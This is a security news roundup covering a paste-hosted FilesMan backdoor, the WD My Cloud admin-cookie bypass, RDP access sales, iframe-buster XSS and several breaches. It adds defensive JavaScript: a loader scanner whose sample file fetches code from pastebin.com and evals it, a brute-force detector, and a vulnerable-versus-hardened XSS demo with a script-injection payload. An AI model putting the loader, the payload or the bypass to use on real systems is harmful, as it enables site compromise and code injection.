• Can Lightweight Encryption Save Us from the Internet of Things?
    Imagine if fire could be hacked and controlled, just like the current generation of IoT devices. What makes each IoT device special is also what makes it vulnerable. It has taken this long, and several workshops, to get NIST's Lightweight Cryptography project to the point where the kinds of protection IoT needs can almost start to be deployed. NIST is trying to pull the candidate designs together into a standard that is easily implementable on most new IoT devices. Its criteria include resistance to attack, cost, the performance of the device once encryption is added, suitability for all IoT devices including those deployed in operational technology, and suitability for both hardware and software implementations. As a government project, IoT encryption is perhaps not as exciting as going to the moon or Mars, but it is sorely needed as we continue to deploy billions more unprotected sensors and devices.
  • Paste Site Used as Hosting Service for FilesMan Backdoor
    Bruno Zanelato found a website backdoor which, unlike its siblings, does not embed its code in a web page but loads it from an online clipboard (paste) service. Website backdoors are malicious tools hidden within a site's code and designed to let an attacker reinfect the target and retain control even after the site has been cleaned. Most malware tailored for websites is added to a page's code and relies on obfuscation to keep site owners from discovering its true purpose. As described in Zanelato's blog post, this unusual backdoor instead keeps only a small loader on the compromised site: the code shown in the post fetches the real payload from the paste site, and that payload lets the attacker reinfect the website at a later date. Once decrypted, the downloaded payload turned out to be the FilesMan malware, which lets threat actors access, modify and reinfect websites at any time post-infection.
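The loader pattern described above lends itself to a simple static check. The following is an added example, not code from Zanelato's post: it flags PHP files that pull a body from a paste service and feed it into an execution sink. The paste-host list, the regular expressions and the three sample files are constructed for illustration.

```javascript
// Added example (not from Zanelato's post): flag PHP files that fetch code from a
// paste/clipboard service and hand it to an execution sink, the FilesMan loader shape.
// The host list, patterns and sample files below are constructed for illustration.

const PASTE_HOSTS = ['pastebin.com', 'paste.ee', 'ghostbin.com', 'hastebin.com'];

// Ways PHP pulls a remote body: URL-capable file functions and cURL.
const REMOTE_FETCH = /\b(file_get_contents|fopen|readfile|curl_init|curl_setopt|file)\s*\(/i;
// Sinks that turn a string into running code (including preg_replace with the /e modifier).
const EXEC_SINK = /\b(eval|assert|create_function|call_user_func|call_user_func_array)\s*\(|preg_replace\s*\([^,]*\/[a-z]*e[a-z]*['"]/i;
// Payloads are usually stored encoded so the fetched text looks inert.
const DECODER = /\b(base64_decode|gzinflate|gzuncompress|str_rot13|gzdecode)\s*\(/i;

// Return every URL in the source whose host is (a subdomain of) a known paste service.
function findPasteUrls(src) {
  const urls = src.match(/https?:\/\/[^\s'"()<>]+/gi) || [];
  return urls.filter(u => {
    try {
      const host = new URL(u).hostname.toLowerCase();
      return PASTE_HOSTS.some(h => host === h || host.endsWith('.' + h));
    } catch (e) { return false; }
  });
}

// Score one file. A paste URL that reaches an execution sink is the loader itself;
// a remote fetch on its own is common in benign code and only raises the score.
function scanPhp(path, src) {
  const pasteUrls = findPasteUrls(src);
  const reasons = [];
  let score = 0;
  if (pasteUrls.length) { score += 2; reasons.push('paste-service URL: ' + pasteUrls.join(',')); }
  if (REMOTE_FETCH.test(src)) { score += 1; reasons.push('remote fetch'); }
  if (EXEC_SINK.test(src)) { score += 2; reasons.push('code execution sink'); }
  if (DECODER.test(src)) { score += 1; reasons.push('payload decoder'); }
  const verdict = pasteUrls.length && EXEC_SINK.test(src) ? 'backdoor-loader'
                : score >= 3 ? 'suspicious' : 'clean';
  return { path, verdict, score, reasons };
}

// Constructed sample files: a loader, a benign remote fetch, and ordinary code.
const SAMPLES = {
  'wp-content/uploads/cache.php':
    "<?php $c = file_get_contents('https://pastebin.com/raw/aBcDeF12'); eval(gzinflate(base64_decode($c)));",
  'wp-content/themes/x/functions.php':
    "<?php $json = file_get_contents('https://api.wordpress.org/core/version-check/1.7/'); $v = json_decode($json);",
  'wp-admin/includes/misc.php':
    "<?php function wp_hash($d) { return md5($d); }",
};

function scanAll(samples = SAMPLES) {
  return Object.entries(samples).map(([p, s]) => scanPhp(p, s));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of scanAll()) console.log(r.verdict.padEnd(16), r.path, r.reasons.join('; '));
}
```

Run it over a site's document root and triage the `backdoor-loader` hits first; the loader is tiny, so a file-size filter would miss it, which is why the check is on the fetch-plus-sink combination rather than on size or entropy.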
  • No personal info lost in ransomware attack, says VON Canada
    VON's computer systems in Nova Scotia and Ontario were affected by the cyber attack. VON Canada is assuring clients and staff that their information is safe after the nursing organization was the target of a ransomware incident earlier this month. Ransomware is malicious software designed to hold a computer system hostage, blocking access until money is paid. The Victorian Order of Nurses said in a statement on its website that it has not paid any ransom. "There is no evidence at this time to indicate that any employee, client or volunteer information was compromised in any way," the statement read. The organization said it discovered the problem Sept. 1 and immediately shut down all its computer systems to make sure its network and user data stayed secure. VON's phone and email systems were included in the shutdown, which led to some delays and missed appointments. VON said it went to "manual operations" for scheduling care and client information.
  • 'I am admin' bug turns WD's My Cloud boxes into Everyone's Cloud
    Miscreants can potentially gain admin-level control over Western Digital's My Cloud gear via an HTTP request over the network or internet. Researchers at infosec shop Securify today revealed the vulnerability, designated CVE-2018-17153, which allows an unauthenticated attacker with network access to the device to bypass password checks and log in with admin privileges. According to Securify, the flaw lies in the way My Cloud creates admin sessions that are bound to an IP address. When an attacker sends a command to the device's web interface as an HTTP CGI request, they can also include the cookie username=admin, which unlocks admin access. A properly constructed request therefore establishes an admin login session on the device without ever being asked for a password. "The network_mgr.cgi CGI module contains a command called cgi_get_ipv6 that starts an admin session that is tied to the IP address of the user making the request when invoked with the parameter flag equal to 1," Securify explained.
  • Blue Cross and Blue Shield of Rhode Island and Independence Blue Cross report breaches
    Blue Cross and Blue Shield of Rhode Island (BCBSRI) is blaming a vendor for a breach that compromised the personal health information of 1,567 people, and Philadelphia-based insurer Independence Blue Cross was breached in a separate incident. The unnamed vendor reportedly sent member benefits explanations, also known as health-care service summaries, to the wrong BCBSRI member in the same household or on the same family policy, according to the Providence Journal. The mistake stemmed from Blue Cross' use of a vendor "to combine healthcare service summaries for some members who were covered on the same policy in an effort to reduce the number of summaries members received. In mid-July, BCBSRI learned that in some instances, the summaries were being combined incorrectly by the vendor, resulting in summaries being sent to the wrong family member or other person covered on their family policy," the report said. The firm emphasized that no information was disclosed to anyone other than a family member or a person covered on the same family policy.
  • A vigilante botnet is taking out crypto-jacking malware
    A new botnet is on the rise, but it isn't being used to take down websites or hack servers: it goes after crypto-jacking malware. Known as Fbot, the botnet scans for a specific piece of mining malware and, when it finds it, takes over the nefarious software and then destroys itself, taking the malware with it. Typically, the mining malware is installed via a malicious download or an infected website and forces the system it lands on to mine cryptocurrency. As of now, the creators of Fbot remain as unknown as the developers of the crypto-jacking malware it targets, but their efforts appear admirable. The researchers who discovered the botnet, Qihoo 360 Netlab, say there appear to be links between it and the Satori botnet, which has in the past been used to infect mining hardware.
  • RDP Ports Prove Hot Commodities on the Dark Web
    Most of the time, RDP is used for legitimate remote administration: when companies outsource IT, or when remote admins have to reach a colleague's machine, they most commonly connect over RDP. A threat actor with RDP access can do a great deal (credential harvesting, account takeover and cryptocurrency mining among them), and it's far easier to launch these attacks when an RDP endpoint is already open to them. Hence threat actors of all skill levels buy RDP access on the Dark Web, where it is a hot commodity, as are tools to wipe an attacker's traces once their work is done. Less skilled attackers are more likely to purchase bulk RDP access there, Wisniewski adds, because they lack the expertise to find exposed ports themselves. Breaching networks and servers via exposed RDP remains of great interest to cybercriminals, according to Flashpoint, and there is a clear trend toward automating both the discovery of exposed RDP targets and the brute-forcing of access.
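Since the attack side is being automated, the detection side should be too. The following is an added example, not from the Flashpoint or Wisniewski reporting: it runs over constructed Windows Security events (4625 failed logon, 4624 successful logon; logon type 10 for RemoteInteractive, and type 3 for the pre-authentication failures RDP produces when Network Level Authentication is on) and flags a source that exceeds a failure threshold within a window, plus the case that matters most, a success from that same source afterwards. The threshold, the window and the sample events are constructed.

```javascript
// Added example (not from the reporting cited above): detect automated RDP
// brute-forcing in Windows Security log records. Sample events are constructed;
// field names follow the 4624/4625 event schema (EventID, LogonType, IpAddress, TargetUserName).

const FAILED_LOGON = 4625, SUCCESS_LOGON = 4624;
const REMOTE_INTERACTIVE = 10;   // RDP session logon
const NETWORK = 3;               // what NLA pre-auth failures over RDP are logged as
const RDP_TYPES = new Set([NETWORK, REMOTE_INTERACTIVE]);

// Sliding-window count of failures per source IP; one alert per source when the
// threshold is crossed, and a second, higher-severity alert if that source then succeeds.
function detectRdpBruteForce(events, { threshold = 5, windowMs = 5 * 60 * 1000 } = {}) {
  const bySource = new Map();
  const alerts = [];
  for (const e of [...events].sort((a, b) => a.time - b.time)) {
    if (!RDP_TYPES.has(e.logonType)) continue;
    const st = bySource.get(e.ip) || { failures: [], alerted: false };
    bySource.set(e.ip, st);
    if (e.id === FAILED_LOGON) {
      st.failures.push(e.time);
      while (st.failures.length && e.time - st.failures[0] > windowMs) st.failures.shift();
      if (st.failures.length >= threshold && !st.alerted) {
        st.alerted = true;
        alerts.push({ type: 'rdp-bruteforce', ip: e.ip, failures: st.failures.length, at: e.time });
      }
    } else if (e.id === SUCCESS_LOGON && st.alerted) {
      alerts.push({ type: 'rdp-success-after-bruteforce', ip: e.ip, user: e.user, at: e.time });
    }
  }
  return alerts;
}

// Constructed sample: one scanner sweeping usernames then landing a password,
// one admin mistyping twice, and a console logon that is not RDP at all.
const T0 = Date.UTC(2018, 8, 18, 3, 0, 0);
const SAMPLE_EVENTS = [
  ...['administrator', 'admin', 'user', 'test', 'scan', 'backup'].map((user, i) =>
    ({ time: T0 + i * 2000, id: 4625, logonType: 3, ip: '203.0.113.7', user })),
  { time: T0 + 20000, id: 4624, logonType: 10, ip: '203.0.113.7', user: 'backup' },
  { time: T0 + 1000, id: 4625, logonType: 10, ip: '10.0.0.12', user: 'jdoe' },
  { time: T0 + 4000, id: 4625, logonType: 10, ip: '10.0.0.12', user: 'jdoe' },
  { time: T0 + 9000, id: 4624, logonType: 10, ip: '10.0.0.12', user: 'jdoe' },
  { time: T0 + 30000, id: 4625, logonType: 2, ip: '-', user: 'console' },
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const a of detectRdpBruteForce(SAMPLE_EVENTS)) console.log(a);
}
```

Tune the threshold per environment; the success-after-burst alert is the one to page on, since it means a purchased or guessed credential is now being used. Note that slow sprays spread across many sources will not trip a per-IP window, which is why exposed RDP is better removed (VPN or gateway in front) than merely monitored.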
  • EPAM Systems Partners Positive on Cybersecurity Research Lab
    EPAM Systems, Inc. (EPAM) recently announced that it has joined forces with cybersecurity consulting and research firm Positive on a Cybersecurity R&D Lab dedicated to research in security solutions and services. With enterprises realizing the need for stricter security measures, EPAM and Positive's combined research infrastructure is expected to serve that purpose. Companies are expected to further increase spending on cyber security, including the intensive research needed to come up with sounder measures against breaches, and EPAM seems set to cash in on this opportunity. EPAM currently has a Zacks Rank #3 (Hold).
  • Expandable ads can be entry points for site hacks
    The researcher says he identified several vulnerabilities in iframe busters, the name given to files that websites host on their own server to support "expandable" ads. Advertising companies provide these iframe busters to site owners who want to show ads from the ad network's portfolio. Westergren says that many of these iframe buster scripts contain cross-site scripting (XSS) vulnerabilities that allow an attacker to abuse the iframe buster file hosted on a site's server to run malicious JavaScript on that site, in the site's own origin. The researcher says he identified XSS vulnerabilities in most of the iframe buster scripts that, until recently, Google had been providing for download as part of a multi-vendor iFrame Buster kit offered through the DoubleClick AdExchange documentation site. Westergren detailed four examples on his blog, showing how an attacker could run malicious code on any site that uses iframe busters from ad networks like Adform, Eyeblaster (Add in Eye), Adtech, and Jivox.
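What makes an iframe buster dangerous is that it runs on the publisher's origin while taking its parameters from a URL that the creative, or anyone else, can craft. The following is an added example, not Westergren's proof of concept nor any ad network's actual buster file: a pure-function model of a buster that reads a script URL from its query string, first reflected unchecked the way a document.write-based buster does it, then validated against an https-only host allowlist. The url parameter name, the allowlisted host and the payload are assumptions.

```javascript
// Added example, not Westergren's PoC or any ad network's buster file: the shape of
// the iframe-buster XSS and a hardened version. Parameter name, allowlist and payload
// are constructed assumptions. Runs under Node; the DOM write is modelled as a string.

function params(search) {
  return new URLSearchParams(search.startsWith('?') ? search.slice(1) : search);
}

// Vulnerable: the buster page, served from the publisher's origin, builds markup from
// the raw parameter (the document.write pattern), so the parameter owns the script tag.
function vulnerableBuster(search) {
  const url = params(search).get('url') || '';
  return '<script src="' + url + '"></script>';
}

// Hardened: only an absolute https URL on an approved ad-server host, with no embedded
// credentials, is accepted; the caller then creates a script element with this href
// instead of writing markup. Anything else is refused with a reason.
function hardenedBuster(search, allowedHosts) {
  const raw = params(search).get('url') || '';
  let u;
  try { u = new URL(raw); } catch (e) { return { ok: false, reason: 'not an absolute URL' }; }
  if (u.protocol !== 'https:') return { ok: false, reason: 'scheme ' + u.protocol };
  if (!allowedHosts.includes(u.hostname)) return { ok: false, reason: 'host ' + u.hostname };
  if (u.username || u.password) return { ok: false, reason: 'credentials in URL' };
  return { ok: true, src: u.href };
}

// Constructed allowlist and a constructed attacker link to the publisher's buster file.
const ALLOWED = ['cdn.example-adserver.test'];
const PAYLOAD = '?url=https://x/"></script><script>alert(document.domain)</script>';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable writes:', vulnerableBuster(PAYLOAD));
  console.log('hardened says:   ', hardenedBuster(PAYLOAD, ALLOWED));
  console.log('hardened accepts:', hardenedBuster('?url=https://cdn.example-adserver.test/expand.js', ALLOWED));
}
```

Even the hardened version still lets the allowlisted ad server run script on the publisher's origin, which is the trust relationship the ad network is asking for; the change is that nobody else can. Publishers who cannot vet each buster file should keep them off the main origin entirely (a sandboxed subdomain) so that an XSS in one is not an XSS in the site.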
  • INTERPOL-Europol conference calls for global response to cybercrime
    With cybercriminals using increasingly sophisticated methods and technologies to carry out their illicit activities, the 6th INTERPOL-Europol Cybercrime Conference will focus on the most pressing cyberthreats today and in the future, from attacks against the financial and government sectors and the rise of 'cybercrime as a service' to denial-of-service attacks and business e-mail compromise scams. Under the theme 'Globalized efforts to tackle cybercrime', the three-day (18 to 20 September) conference will look at ways in which stakeholders from all sectors can combine their expertise to make the internet a more secure environment. Key areas of discussion will include developing actionable cyberthreat intelligence, identifying cybercriminals through their online behaviour, defining the role of digital forensics, implementing national and regional legislation to tackle cybercrime, and crisis response planning.